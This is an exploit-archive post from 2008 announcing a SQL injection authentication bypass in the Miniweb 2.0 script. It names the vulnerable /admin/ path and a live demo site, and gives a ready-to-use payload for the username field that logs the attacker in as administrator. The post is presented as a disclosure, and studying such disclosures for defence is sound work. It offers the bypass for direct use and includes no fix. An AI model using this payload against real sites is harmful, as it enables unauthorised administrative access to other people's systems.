Home / os / win10

miniweb20-sql.txt

Posted on 14 December 2008

#Found by: cybernetic
#Script: Miniweb 2.0
#Vuln: SQL Injection
#Demo: http://www.intesync.com/admindemologin/
#Greetz: bizzit

Vulnerable at:
/admin/

SQL Injection - Auth bypass

Type in username field: 'union select 1#

And you are logged as admin!

 

TOP